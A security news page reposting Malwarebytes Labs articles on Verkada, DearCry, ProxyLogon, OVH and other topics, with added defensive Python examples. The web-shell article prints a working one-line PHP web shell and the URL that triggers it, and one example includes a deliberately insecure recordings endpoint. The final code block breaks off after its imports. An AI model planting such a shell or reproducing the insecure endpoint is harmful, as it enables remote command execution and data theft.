IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

The Malwarebytes 2021 State of Malware report: Lock and Code S02E04

This week on Lock and Code, we discuss the top security headlines generated right here on Labs. In addition, we tune in to a special presentation from Adam Kujawa about the 2021 State of Malware report, which analyzed the top cybercrime goals of 2020 amidst the global pandemic.

If you just pay attention to the numbers from last year, you might get the wrong idea. After all, malware detections for both consumers and businesses decreased in 2020 compared to 2019. That sounds like good news, but it wasn’t. Behind those lowered numbers were more skillful, more precise attacks that derailed major corporations, hospitals, and schools with record-setting ransom demands.

Tune in to hear about how cybercrime has changed, along with examples of some of the most nefarious malware upgrades, on the latest episode of Lock and Code, with host David Ruiz.

https://feed.podbean.com/lockandcode/feed.xml

You can also find us on the Apple iTunes store, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.


Stay safe!

The post The Malwarebytes 2021 State of Malware report: Lock and Code S02E04 appeared first on Malwarebytes Labs.

150,000 Verkada security cameras hacked—to make a point

Hackers were able to gain access to camera feeds from Verkada, a tech company that specializes in video security and physical access control, to demonstrate how prevalent surveillance is, reports say.

Unfortunately, it also exposed the inner workings of hospitals, clinics, and mental health institutions; banks; police departments; prisons; schools; and companies like Tesla and Cloudflare, after at least 150,000 cameras were compromised as part of this demonstration.

Verkada is still investigating the scale and scope of the breach.

The attack

Swiss hacker and member of the hacking collective “APT-69420 Arson Cats,” Tillie Kottmann, claimed credit for the Verkada hack. When asked why, they told Bloomberg: “lots of curiosity, fighting for freedom of information and against intellectual property, a huge dose of anti-capitalism, a hint of anarchism—and it’s also just too much fun not to do it.”

Kottmann was also credited for breaching Intel in August 2020 and Nissan Motors in January 2021.

All of Kottmann’s tweets related to the Verkada hack contain the #OperationPanopticon hashtag, which references the panopticon, a prison architecture that allows a supervisor to have full view of its inmates without them knowing that they’re being watched. It is also a metaphor used to illustrate surveillance technology.

It isn’t clear if this operation is a name for just the Verkada hack, or a name for a series of breaches against surveillance companies that could affect millions, with Verkada just the first company to be targeted and breached.

Speaking to Bloomberg, Kottmann said this incident “exposes just how broadly we’re being surveilled, and how little care is put into at least securing the platforms used to do so, pursuing nothing but profit. It’s just wild how I can just see the things we always knew are happening, but we never got to see.”

Twitter suspended Kottmann’s account after they leaked Tesla security footage.

When asked how they were able to breach Verkada, Kottmann claimed that they found an administrator account credential that, for whatever reason, was publicly available online. The account had “super admin” rights, which gave them access to any camera belonging to any of the company’s clients.

IPVM reports that a source “with direct knowledge” discovered that “basically every team member” at Verkada, including executives, had super-admin privileges.

IPVM also reports that super-admin access went further than simply letting the hackers see whatever they wanted:

Not only did Super Admin provide access to video feeds … it provided access to the root shell inside the cameras running inside each customer’s facility.

The response

In a statement about the incident, Verkada confirmed IPVM’s reporting, admitting that attackers had “gained access to a tool that allowed the execution of shell commands on a subset of customer cameras”.

According to the company, attackers gained access via a Jenkins server “used by our support team to perform bulk maintenance operations on customer cameras”, which gave them access to “video and image data from a limited number of cameras from a subset of client organizations”. Attackers also gained access to lists of client account administrators and sales orders.

Seeking to reassure customers, the company said it had now secured its systems.

First, we have identified the attack vector used in this incident, and we are confident that all customer systems were secured as of approximately noon PST on March 9, 2021. If you are a Verkada customer, no action is required on your part.

This isn’t Verkada’s first bout with negative publicity. In October 2020, three employees were fired after they abused Verkada’s own video surveillance system to capture and pass on media of female colleagues with sexually explicit jokes in one of the company’s Slack rooms.

Vice’s Motherboard was able to interview a Verkada employee who was unimpressed by the whole incident, saying “the big picture for me having worked at the company is that it has opened my eyes to how surveillance can be abused by people in power.”

The fallout

The hack raises serious questions about who had access to what, and why, and highlights both the security and privacy risks that come with admin and super-admin accounts. Simply, the more administrators there are, the more targets there are.

Administrator or super-administrator accounts should only be issued to people who need them to do their job, and those people should only use them if an account with lower privileges can’t be used. They should never be used for convenience.
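One way to turn the principle above into a check, as an added example that is not Verkada's code or API: given an export of accounts with their assigned role and a log of the actions each account actually performed, find the super-admin accounts that never used anything a lower role could not do, and the privileged accounts nobody has used recently. The role names, permission model and field names are assumptions for the example.

```python
"""Least-privilege audit for admin and super-admin accounts.

Added example, not Verkada's code or API. Role names, the permission model
and the export field names are assumptions for the example.
"""
from collections import Counter
from datetime import datetime, timedelta, timezone

# Assumed permission model, ordered from least to most privileged, so the
# smallest sufficient role for an account can be proposed.
ROLE_ORDER = ["viewer", "site_admin", "super_admin"]
ROLE_ACTIONS = {
    "viewer": {"view_live", "view_archive"},
    "site_admin": {"view_live", "view_archive", "add_camera", "manage_site_users"},
    "super_admin": {"view_live", "view_archive", "add_camera", "manage_site_users",
                    "manage_all_orgs", "camera_shell"},
}


def minimal_role(actions_used):
    """Smallest role whose action set covers everything the account actually did."""
    for role in ROLE_ORDER:
        if set(actions_used) <= ROLE_ACTIONS[role]:
            return role
    # Actions outside the model: keep the top role and review the account by hand.
    return ROLE_ORDER[-1]


def audit(accounts, activity, now, stale_after=timedelta(days=90)):
    """accounts: [{"user", "role"}]; activity: [{"user", "action", "at"}].

    Returns role counts, accounts whose observed activity fits a lower role
    (downgrade candidates) and privileged accounts unused for `stale_after`.
    """
    used, last_seen = {}, {}
    for ev in activity:
        used.setdefault(ev["user"], set()).add(ev["action"])
        if ev["user"] not in last_seen or ev["at"] > last_seen[ev["user"]]:
            last_seen[ev["user"]] = ev["at"]

    report = {"role_counts": Counter(a["role"] for a in accounts),
              "downgrade": [], "stale_privileged": []}
    for acct in accounts:
        if acct["role"] == ROLE_ORDER[0]:
            continue  # lowest role already; nothing to take away
        needed = minimal_role(used.get(acct["user"], set()))
        if ROLE_ORDER.index(needed) < ROLE_ORDER.index(acct["role"]):
            report["downgrade"].append((acct["user"], acct["role"], needed))
        seen = last_seen.get(acct["user"])
        if seen is None or now - seen > stale_after:
            report["stale_privileged"].append(acct["user"])
    return report


def demo():
    """Run the audit over a constructed export; returns the report."""
    now = datetime(2021, 3, 10, tzinfo=timezone.utc)
    accounts = [
        {"user": "alice", "role": "super_admin"},  # only ever watches feeds
        {"user": "bob", "role": "super_admin"},    # support engineer using the camera shell
        {"user": "carol", "role": "super_admin"},  # never used at all
        {"user": "dave", "role": "site_admin"},    # right role, but idle for months
        {"user": "erin", "role": "viewer"},
    ]
    activity = [
        {"user": "alice", "action": "view_live", "at": datetime(2021, 3, 1, tzinfo=timezone.utc)},
        {"user": "bob", "action": "camera_shell", "at": datetime(2021, 3, 5, tzinfo=timezone.utc)},
        {"user": "dave", "action": "add_camera", "at": datetime(2020, 11, 1, tzinfo=timezone.utc)},
        {"user": "erin", "action": "view_live", "at": datetime(2021, 3, 9, tzinfo=timezone.utc)},
    ]
    return audit(accounts, activity, now)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run against a real export, the downgrade list is the conversation to have with each account's owner; an account that never touched a super-admin-only capability in ninety days does not need that role on a day-to-day basis, and a break-glass account with separate monitoring covers the rare exception.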

Speaking to Bloomberg about the consent and privacy implications, Eva Galperin, the Electronic Frontier Foundation’s director of cybersecurity, made the point that employees at companies that use a network of cameras may not expect that anyone other than the company’s security team is watching them.

“There are many legitimate reasons to have surveillance inside of a company,” Galperin said in a Bloomberg interview. “The most important part is to have the informed consent of your employees.”

Finally, it should not be forgotten that Verkada and its customers were the victims of a crime. Accessing other people’s computers without their consent is still illegal, no matter how good your point is.

The post 150,000 Verkada security cameras hacked—to make a point appeared first on Malwarebytes Labs.

Ransomware is targeting vulnerable Microsoft Exchange servers

The Microsoft Exchange attacks using the ProxyLogon vulnerability, and previously associated with the dropping of malicious web shells, are taking on a ransomware twist. Until now, the name of the game has been compromise and data exfiltration, with a bit of cryptomining on the side.

To summarise: In ten days we’ve gone from “limited and targeted attacks” by a nation-state actor, to countless attacks by a number of groups against anyone with a vulnerable server. And in the space of a week the severity has escalated from unused web shells to ransomware. Depending on how the uptake in patching goes, this could well evolve again.

The danger of this pivot to ransomware is the sheer number of potential targets. Needless to say, it is essential that you install the Exchange updates required to keep your systems safe from harm.

The scale of the problem

Internet intelligence group Shadowserver has attempted to quantify the problem of exposed Exchange servers by scanning the Internet looking for vulnerable machines.

It has made two startling conclusions. The first is that as many as 68,500 servers may have been compromised by the so-called Hafnium threat actor before Microsoft released patches for its Exchange zero-days.

The total dataset distributed includes over 68500 distinct IP addresses. Of these IP addresses, there is high certainty that 8911 IP addresses were compromised. However, the remaining IP addresses included in the report are also very likely compromised too, since they were targeted with the OWA 0-day exploit before Microsoft publicly released patches for Exchange.

The group’s second insight is that at the time of its most recent scan, three days ago, 64,088 unique IP addresses were assessed as “still having exposed Microsoft Exchange Server vulnerabilities”. According to the group, the USA has by far the largest population of vulnerable servers, with almost 17,500.

The group’s research partner, the Dutch Institute for Vulnerability Disclosure, reported separately that nearly 20% of the 250,000 servers it scanned were vulnerable.

Whichever way you slice it, there are still a lot of vulnerable Exchange servers out there, and history suggests it will take a considerable time to patch them all.

With that out of the way: what, exactly, is the ransomware angle to this latest round of ProxyLogon attacks?

Introducing DearCry ransomware

Bad actors are now using Exchange exploits to gain entry to networks, before manually running DearCry ransomware.

This is an indicator of how easy Exchange exploitation is becoming. For years, targeted ransomware attacks have been synonymous with brute-force attacks on RDP ports. It’s such a common tactic, it’s easy to forget that criminals were simply using the easiest method of entry available.

The ransomware, first reported by BleepingComputer, has been dubbed “DearCry”. This is because it uses “DEARCRY!” as a file marker inside every encrypted file.
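As an added triage example (not from the original post or from any vendor tool): a scanner that walks a directory tree and lists the files carrying the DEARCRY! marker, so a responder can size the damage before deciding what to restore. The post only says the marker is inside each encrypted file; the assumption that it appears within the first few kilobytes is ours, and the sample files and their names are constructed.

```python
"""Triage scan for files carrying a ransomware file marker.

Added example, not from the original post or any vendor tool. The assumption
that the marker appears within the first few kilobytes is ours; sample files
are constructed.
"""
import os
import tempfile
from collections import Counter

MARKER = b"DEARCRY!"


def has_marker(path, marker=MARKER, window=4096):
    """True if `marker` occurs within the first `window` bytes of the file."""
    try:
        with open(path, "rb") as fh:
            return marker in fh.read(window)
    except OSError:
        return False  # unreadable or vanished files are skipped, not fatal


def find_marked_files(root, marker=MARKER, window=4096):
    """Walk `root`; return (sorted relative paths of marked files, counts by extension)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if has_marker(full, marker, window):
                hits.append(os.path.relpath(full, root))
    hits.sort()
    by_ext = Counter(os.path.splitext(h)[1].lower() or "(none)" for h in hits)
    return hits, by_ext


def demo():
    """Build a constructed sample tree in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="dearcry-triage-")
    samples = {
        "docs/report.docx.CRYPT": MARKER + b"\x00" * 64,         # marker at offset 0
        "db/backup.sql.CRYPT": b"\xff" * 100 + MARKER + b"...",  # marker later in the header
        "docs/notes.txt": b"meeting notes, nothing to see",      # untouched file
        "big.bin": b"A" * 8192 + MARKER,                          # beyond the window: missed
    }
    for rel, data in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return find_marked_files(root)


if __name__ == "__main__":
    marked, by_ext = demo()
    print(len(marked), "marked files", dict(by_ext))
    for path in marked:
        print(" ", path)
```

The big.bin sample is deliberately missed: a fixed read window keeps the scan cheap across a file server, but it has to be sized for where the marker really sits, so confirm the offset on a known-encrypted file before trusting a count.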

Malwarebytes and Microsoft have both independently confirmed that ProxyLogon is the entry vector for DearCry.

At the time of writing, it seems there is no way to decrypt the files without payment. As ever, prevention is better than cure, but if you are attacked successfully you’ll wish you’d secured your off-site backups and put a disaster recovery plan in place.

Once encryption takes place, the inevitable ransom note is deployed.

With backups and plans to restore them in place, victims can choose to ignore the attackers and carry on as normal. However, it is possible copies of the compromised files remain in the hands of the ransomware authors. This is how you get leaks further down the line.

According to BleepingComputer, a demand for $16,000 was made to one victim for the safe decryption of their files. There isn’t enough information available at this stage to determine if $16,000 is the going rate for DearCry attacks, or if there’s some variance to the amounts requested.

What’s certain is that other ransomware gangs will happily charge vastly greater sums, and if Exchange exploitation proves easier than RDP access, they will use it.

It’s time to update

If you haven’t already patched your systems, please do so right away and search your systems for signs of compromise.

Malwarebytes detects web shells planted on compromised Exchange servers as Backdoor.Hafnium. When the ransomware was still unknown, DearCry attacks would have been detected proactively as Malware.Ransom.Agent.Generic.

(Screenshot: the detections as shown in the Malwarebytes Nebula console)

We’ll update the timeline in our first article on this topic as more developments and fresh information come to light.

The post Ransomware is targeting vulnerable Microsoft Exchange servers appeared first on Malwarebytes Labs.

Police credit “unlocked” SKY ECC encryption for organized crime bust

At the moment, I’m really torn, and I need your help. Let me tell you what is going on. I read these statements and they can’t both be true, right?

“The continuous monitoring of the illegal Sky ECC communication service tool by investigators in three countries has provided invaluable insights into hundreds of millions of messages exchanged between criminals.”

“SKY ECC platform remains secure and no authorized Sky ECC device has been hacked.”

I’ll give you some more background and then you can help me decide.

Arrests made

It was reported today that Belgian police raided 200 locations and arrested 48 people (this was a big headline in Belgium). Two of those people are suspected of being corrupt cops in the Antwerp police force. The police stated they were able to make these arrests because they were able to intercept and read messages on encrypted phones provided by SKY ECC.

Europol claims “invaluable insights”

Europol released a statement about the background of these actions, which started:

Judicial and law enforcement authorities in Belgium, France and the Netherlands have in close cooperation enabled major interventions to block the further use of encrypted communications by large-scale organised crime groups (OCGs), with the support of Europol and Eurojust. The continuous monitoring of the illegal Sky ECC communication service tool by investigators in the three countries involved has provided invaluable insights into hundreds of millions of messages exchanged between criminals. 

It went on to describe the operations as “an essential part of the continuous effort of judiciary and law enforcement in the EU and third countries to disrupt the illegal use of encrypted communications”.

SKY ECC says it “remains secure”

Sky ECC advertises itself as “most secure messaging platform you can buy”, and has around 170,000 users worldwide.

In response to the articles published in the Dutch and Belgian press, SKY ECC let the public know that all allegations that Belgian and/or Dutch authorities have cracked or hacked SKY ECC encrypted communication software are false, stating:

SKY ECC is built on “zero-trust” security principles which assumes every request as a breach and verifies it by employing layers of security to protect its users’ messages. All SKY ECC communications are encrypted through private tunnels via private distributed networks. All messages are encrypted with today’s highest level of encryption.

(Image: SKY ECC’s statement, as posted on the SKY ECC website)

Unlocked encryption

Are you still with me? Now, if we think hard, there are some scenarios where both statements could be true. Maybe the police are talking about analysing unencrypted metadata, or had access to a limited number of decryption keys. Or maybe they had someone on the inside feeding them information. But those go out of the window when we read the Europol statement and find the sentence “By successfully unlocking the encryption of Sky ECC…”

Who can you trust?

“Who do we trust?” is an important question in many security and privacy related matters. It may be the way I was raised, but I tend to trust the police in these matters, even if not every police force is equipped to deal with modern cybercrimes.

Of course, there is a chance that whoever drafted the Europol statement made an error, or that “unlocking the encryption” is a deliberate red herring to protect another source. But I cannot overlook that Europol and Eurojust (European Union Agency for Criminal Justice Cooperation) happen to have an excellent track record in this field.

SKY ECC on the other hand has every reason to deny it has been breached. Proof that it has could prove to be destructive for a company whose customers are invested in trusting its equipment and services.

A third possibility

There is a third possibility too, raised in the SKY ECC statement. In it, the company says (my emphasis) “distributors in Belgium and the Netherlands brought to our attention that a fake phishing application falsely branded as SKY ECC was illegally created, modified and side-loaded onto unsecure devices, and security features of authorized SKY ECC phones were eliminated in these bogus devices which were then sold through unauthorized channels.”

If the police hacked, or even created, an insecure imposter device they can monitor—one that fools potential criminals into believing they have the real thing—then it is possible for both sides to be telling at least a partial truth.

Is the proof in the pudding?

Arrests in these countries are not made lightly, so the police force must have had some information to go on. And the sheer number of arrests made leads us to believe that this was not the result of the police having access to one device (one server may be a more likely option, or many fake devices).

As you can tell, I seem to have made up my mind along the way. But we appreciate your thoughts on the matter.

If any side decides to reveal more information, we will keep you updated.

Stay safe, everyone!

The post Police credit “unlocked” SKY ECC encryption for organized crime bust appeared first on Malwarebytes Labs.

5 common VPN myths busted

Virtual Private Networks (VPNs) are popular but often misunderstood. There are many misconceptions about them—misconceptions that may be stopping people from adding a useful layer to their security and privacy defenses.

So, let’s do some myth busting.

1. VPNs are for illegal activity

Some people think that VPNs are only useful for doing things like torrenting, accessing geo-locked content, or getting around work/school/government firewalls. While they certainly are used for those activities, that doesn’t mean that’s all they’re good for or that everyone who uses a VPN is planning to do something illegal or immoral with it.

As awareness of corporate surveillance and criminal hacking has grown, so have concerns about personal privacy. Many people believe that it should be their choice when and how they give up some of their privacy, and don’t want prying eyes on their normal, legitimate behavior. A VPN gives them more control over what they share and with whom, and a little less to worry about.

2. I don’t need a mobile VPN

Some people think they don’t need a mobile VPN because their carrier looks after their security, or has a lot to say about privacy.

While carriers and ISPs are legally required to secure their telecom infrastructure, many ISPs have also shown that they are very interested in tracking their subscribers and profiting from their data. It may feel as if you are protected behind the IP address your ISP assigns you, but your ISP itself can see exactly:

  • When you log on and off
  • The websites you visit
  • How much time you spend on those sites
  • And more, depending on your habits and the apps you use

Using a VPN shifts your trust from your ISP to your VPN provider, so you can choose to use your carrier’s secure telecom infrastructure without giving your carrier access to your browsing data.

3. VPNs will slow down my internet connection

Since a VPN sends your network traffic on a bit of a detour, it has to travel further than it would without a VPN. Technically that means your traffic is slower, but it doesn’t necessarily have to be noticeably slower. Most VPN providers let you choose a server near you, which keeps the detour short.


Also, encrypting and decrypting data takes time. However, a VPN built on modern protocols and encryption has the edge here: the technology has improved over the years and VPNs have become faster and more efficient.

4. My VPN won’t let me watch Netflix

Many streaming sites and apps don’t like it when you use a VPN to watch their content and some just outright ban it (because they have an obligation to lock certain content based on region), which leaves some people believing they have to choose between privacy or entertainment.

Now, if getting around locked content is not your main purpose for using a VPN, simply look for one that offers a bypass feature, otherwise known as split tunneling. This tells your VPN that certain apps get a pass and can connect outside the tunnel, unencrypted, thus “splitting” the tunnel into two: one that is private and one that is not.

So, you can have your banking app running, shielded by your VPN, and watch Netflix.

5. VPNs are for geeks and power users

While this may have been true in the past, VPNs have become easier to use over the years. With the introduction of paid VPNs, vendors have taken it upon themselves to lower prices and improve quality, and to make their products easier to use.

You should expect a straightforward installation process and intuitive functionality that makes using a VPN just as easy as checking your mail or browsing social media (safely).

Stay safe, everyone!

The post 5 common VPN myths busted appeared first on Malwarebytes Labs.

OVH cloud datacenter destroyed by fire

A fire at one of OVH’s datacenter sites has destroyed one datacenter (SBG2) and knocked the neighbouring datacenters on the same site offline. It took 100 firefighters and 43 fire trucks to fight the fire in the five-story building. Even though the fire department was quick to respond, and the fire was brought under control relatively quickly, the impact has been big.

In a press statement OVH promised “to communicate as transparently as possible on the progress of our analyses and the implementation of solutions”.

OVH is the largest hosting provider in Europe and the third largest in the world. The cloud computing company provides virtual private servers, dedicated servers, and other web services.

Customers are being advised by the company to enact their disaster recovery plans after the fire has rendered multiple data centres unserviceable, impacting websites around the world, and a number of organisations involved in cybersecurity.

One such company, Acceis, met the situation with an admirable sense of humour, while providing a dramatic view of the fire.

Data and servers in the cloud

Many organizations use some type of cloud service to keep their setup flexible. But the old saying about the cloud, that “it’s your data on someone else’s computer”, hits home when you suddenly lose a big chunk of your server capacity or your web services out of the blue.

It’s too late to think about a backup plan when you find yourself needing one. As a result of this incident some customers of OVH state their web services are inaccessible. Which usually means that their websites are inaccessible as well.

Sadly, for the video game Rust, the incident has led to a total data loss, leaving no way for recovery (although the company seems to be restoring services fairly rapidly).

BleepingComputer provided this list of victims:

“The list of impacted clients includes cyber threat intelligence company Bad Packets, provider of free chess server Lichess.org, videogame maker Rust, cryptocurrency exchange Deribit’s blog and docs sites, telecom company AFR-IX, encryption utility VeraCrypt, news outlet eeNews Europe, the art building complex Centre Pompidou, and many others.”

And since the data centre site is off limits for now, it will take a while before the offline centres can be restarted.

OVH’s Octave Klaba tweeted:

“We plan to restart SBG1+SBG4+the network by Monday March,15 and SBG3 by Friday March,19.”

Pros and cons of the cloud

The fire is a very dramatic reminder that the cloud has a downside. As with all technology, there are pros and cons to using it.

The great advantages of the cloud are that it makes worrying about hardware somebody else’s problem, it’s scalable and flexible (it can react quickly to changes in demand and you pay for what you use), and it’s accessible from anywhere.

But even in the cloud your data is always somewhere, and that somewhere still needs security (which may be different from what you’re used to), data protection, internet access, backups and disaster recovery.

As OVH put it:

Customers should immediately bring into effect their disaster recovery plans as OVH is working on restoring its services.

That raises the question of how many of its customers had such a disaster recovery plan. It’s too late for them if they didn’t, but if you weren’t affected by this fire, now is the perfect time to check that you have one!

The post OVH cloud datacenter destroyed by fire appeared first on Malwarebytes Labs.

iPhone app exposed other people’s call recordings

Video and audio are huge privacy concerns for people. If something goes wrong with tech it can have major ramifications. You’re likely very familiar with warnings about video. However, audio hasn’t always been so prominent. It’s only really since the rise of home assistants like Amazon’s Alexa that audio worries have gone mainstream.

Turning up the volume on audio threats

Bluetooth earphones and similar devices have only helped to raise awareness of potential issues, as we consider the tools we use the most. As we’ve noted before, it’s generally a lot harder to secure sound than vision. There isn’t an audio equivalent of the bit of tape over your webcam. You’re dealing with the innards of your device, and that’s not for everyone: either the hardware tinkering is beyond them, or their audio setup is a confusing mess of six audio devices and brand-specific audio controls.

It isn’t easy, and that’s just for desktop. Mobile is another proposition altogether, being an incredibly personal device yet something of a mystery-box to many owners. How does your Android phone work? Which version of Android is it even? How do the basic settings differ on your phone from mine? You’re giving me an iPhone for work? Sorry, I’ve never used one of those before.

These are just a sample selection of the things you’ll run into if you’ve ever been nominated your household’s Christmas season tech support. Worse, a lot of what seems to happen on a phone actually happens in the cloud (such as interpreting voice commands), where it’s completely beyond your reach.

Which brings us neatly to a recent discovery.

Listening in to someone else’s recordings

Researchers found an issue with an iPhone call recording app, which boasts of “more than 1,000,000 downloads”. Used to record and share clips via email, or saved to storage solutions such as Dropbox and Google Drive, it offers a fair bit of flexibility for people in need of some audio recording.

The researcher who discovered the vulnerability used security testing tools to view and modify the app’s network traffic. From there, they discovered it was possible to replace their own phone number with someone else’s. With that done, that phone’s recordings (stored in the cloud, in an Amazon AWS bucket) were available to them, without a password. The entire call history, including the numbers the calls were made to, was also available, at least until the app was updated and the problem fixed by the developers.

Or, as the researchers at PingSafe put it:

The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint which leaked the cloud storage URL of the victim’s data

Considering the kind of recordings people could make, this is a worrying thing to have happened. Think of all the business sensitive conversations people might have, or personal discussions, random thoughts, or anything else. Yes, we can argue people shouldn’t upload mission critical work conversations into the cloud (or even a laundry list of complaints about their neighbour). However, if you give people a recording app then record they will.
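The flaw described above, reconstructed as an added example (not the app's actual code): a recordings endpoint that trusts a phone number supplied by the client, beside a fixed version that ignores any phone number in the request and uses the one bound to a validated session. The storage host, the session handling and the signed-URL stand-in are assumptions, and the data is constructed.

```python
"""Insecure direct object reference on a call-recordings API: flawed vs fixed.

Added example, not the app's actual code. The storage host, session
handling and the signed-URL stand-in are assumptions; data is constructed.
"""
import hmac
import secrets

# Constructed backing store: phone number -> private storage keys.
RECORDINGS = {
    "+15550000001": ["rec/2021-03-08/call-a.m4a", "rec/2021-03-09/call-b.m4a"],
    "+15550000002": ["rec/2021-03-07/call-c.m4a"],
}
BUCKET = "https://recordings.example-bucket.invalid/"  # hypothetical storage host
SESSIONS = {}                                            # opaque token -> phone bound at login


def login(phone, proved_ownership=True):
    """Issue an opaque session token once the caller has proved control of `phone`.
    The SMS-code check is stubbed as a flag for the example."""
    if not proved_ownership:
        raise PermissionError("verification failed")
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = phone
    return token


def list_recordings_vulnerable(request):
    """The flawed pattern: the client names the account and nothing checks who is asking.
    Any caller who changes `phone` gets someone else's recordings, no login needed."""
    phone = request["phone"]
    return [BUCKET + key for key in RECORDINGS.get(phone, [])]


def signed_url(key, ttl_s=300):
    """Stand-in for a short-lived pre-signed URL (the cloud SDK does this for real).
    The point: raw bucket paths are never handed out as durable, unauthenticated links."""
    mac = hmac.new(b"server-side-secret", f"{key}:{ttl_s}".encode(), "sha256").hexdigest()[:16]
    return f"{BUCKET}{key}?expires={ttl_s}&sig={mac}"


def list_recordings_fixed(request):
    """Authenticate first, then look up only the data bound to that session.
    A `phone` field in the request is ignored entirely: the server decides whose data it is."""
    phone = SESSIONS.get(request.get("session"))
    if phone is None:
        raise PermissionError("unauthenticated")
    return [signed_url(key) for key in RECORDINGS.get(phone, [])]


if __name__ == "__main__":
    token = login("+15550000001")
    print("vulnerable, asking for someone else:", list_recordings_vulnerable({"phone": "+15550000002"}))
    print("fixed, same request with a session:", list_recordings_fixed({"session": token, "phone": "+15550000002"}))
```

The fix is not a check that the supplied number matches the session; it is removing the client's ability to name the object at all. Whenever an identifier like a phone number, order ID or bucket path arrives from the client, the server must derive ownership from something it issued, and the storage URLs it returns should expire.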

The perils of audio data in the cloud

TechCrunch reports there were 130,000+ audio recordings, weighing in at some 300GB in size, in the storage bucket. That’s a lot of potential for mischief, pranks, trolling, or just plain old blackmail and extortion. If we’re lucky, the only person who noticed this was the researcher who reported it.

Audio has always been a source for security and privacy concerns. Whether we’re talking fake Twitch audio fixes or where people’s data ends up, it’s always worth keeping in mind.

It might not be as visible a concern as the usual security hot-spots on your laptops and mobile devices, or as obvious as video. All the same, it’s an important part of your overall security hygiene.

This is probably an excellent moment to check:

  • whether your audio software needs updating
  • whether your streaming accounts are secure
  • whether you’re happy with any audio files kept in the cloud

Follow these steps and hopefully your audio security will soon catch up with your visual-based best practices.

The post iPhone app exposed other people’s call recordings appeared first on Malwarebytes Labs.

Microsoft Exchange attacks cause panic as criminals go shell collecting

Only last week we posted a blog about multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Since the disclosure came with a patch already available, under normal circumstances you would see some companies update quickly while others dallied until it bubbled up to the top of their to-do list.

This attack method, called ProxyLogon and attributed to a group called Hafnium, was different. It went from “limited and targeted attacks” to a full-size panic in no time. Attackers are using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

How did this situation evolve? A timeline

To demonstrate how this situation came about we want to show you this timeline of developments:

  • December 2020, CVE-2021-26855 is discovered by DEVCORE, who named the vulnerability ProxyLogon.
  • January 2021, DEVCORE sends an advisory and exploit to Microsoft through the MSRC portal.
  • January 2021, Volexity and Dubex start to see exploitation of Exchange vulnerabilities.
  • January 27, 2021, Dubex shares its findings with Microsoft.
  • February 2, 2021, Volexity informs Microsoft of its findings.
  • March 2, 2021, Microsoft publishes a patch and advisory, which has been updated a few times since then.
  • March 4, 2021, The Cybersecurity and Infrastructure Security Agency issues an emergency directive after CISA partners observe active exploitation of vulnerabilities in Microsoft Exchange on-premises products.
  • March 5, 2021, Microsoft and many security vendors see increased use of these vulnerabilities in attacks targeting unpatched systems, by multiple malicious actors, not just Hafnium.
  • March 8, 2021, CISA issues a warning that it is aware of widespread domestic and international exploitation of these vulnerabilities.

The attacks went from a limited Advanced Persistent Threat (APT) used against targeted victims to cryptomining operations run by “common” cybercriminals in no time flat.

What often happens after vulnerabilities get disclosed and patched is that criminals reverse engineer the fix to create their own copycat exploits, so they can attack while systems are unpatched. Sometimes it takes a lot of skills and perseverance to get a vulnerability to work for you, but looking at the rapid introduction of these Exchange exploits into the threat landscape, this one looks like a piece of cake.

Victims

As of 8 March, Malwarebytes had detected malicious web shells on close to 1,000 unique machines already. Although most of the recorded attacks have occurred in the United States, organizations in other countries are under attack as well.

(Map: instances of Backdoor.Hafnium web shells detected worldwide)

Chris Krebs, the former director of CISA, reckons government agencies and small businesses will be more affected by these attacks than large enterprises, which are less likely to run on-premises Exchange servers.

(Chart: distribution of Backdoor.Hafnium detections by country, as of 8 March 2021)

But Brian Krebs, in a post on his site, states that the Hafnium hackers have accelerated attacks on vulnerable Exchange servers since Microsoft released the patches. His sources told him that 30,000 organizations in the US have been hacked as part of this campaign.

Web shells

A web shell is a malicious script that allows an attacker to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting in this context.)

Web shells don’t attack or exploit a remote vulnerability; they are always the second step of an attack. A web shell may open the door to further exploitation, but it is itself always dropped after an initial exploitation.

Web shell scripts can be written in any of the programming languages designed for use on the web. You will find PHP, ASP, Perl, and many others. Attackers who successfully use web shells take advantage of the fact that many organizations do not have complete visibility into the HTTP sessions on their servers. And most web shells are basically non-executable files, which can make it hard for traditional antivirus software to detect them. The tiniest web shell in PHP on record is only this big:

<?=`$_GET[1]`?>

A shell like this simply executes whatever command an attacker sends to the compromised server. The attacker runs it by calling the script in a browser, or from a command-line HTTP client. For example, the following URL would cause a tiny web shell running on example.com to execute whatever replaces {command}:

www.example.com/index.html?1={command}

As you can see, using this type of backdoor is easy. Once a web shell has been planted, it can be used to create additional web shells or to steal information from the server.

What can we do?

Patch as soon as you can.

Microsoft’s team has published a script on GitHub that can check the security status of Exchange servers. The script has been updated to include indicators of compromise (IOCs) linked to the four zero-day vulnerabilities found in Microsoft Exchange Server.

It was important to patch last week, when it was just targeted attacks, but it’s all the more urgent now that it’s the wild west out there. If you can’t patch your Exchange server, block internet access to it, or restrict access to it by blocking untrusted connections or putting the server behind your VPN.

Scan your server for the presence of malicious web shells. Security vendors have added detection for the publicly posted IOCs and some will detect other malicious web shells as well.

Malwarebytes’ generic detection name for malicious web shells is Backdoor.WebShell and the detection name for the web shells that are tied directly to the Hafnium group is Backdoor.Hafnium.
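The two sides of the web shell problem described above, the script on disk and the request that drives it, can both be checked by a defender. The following is an added example written for this post; it is not Malwarebytes' Backdoor.WebShell or Backdoor.Hafnium logic, nor any project's code. It walks a web root for scripts where request input (`$_GET`, `$_POST`, `Request[...]`) flows straight into code or shell execution, which is exactly the shape of the tiny `<?=`$_GET[1]`?>` shell quoted earlier, and it reads access-log lines for the `?1={command}` pattern of requests that such a shell would leave behind. The regular expressions, the file and directory names, the hint list of command names, and the log lines are all constructed for the demonstration.

```python
import os
import re
import tempfile
from urllib.parse import parse_qs, urlsplit

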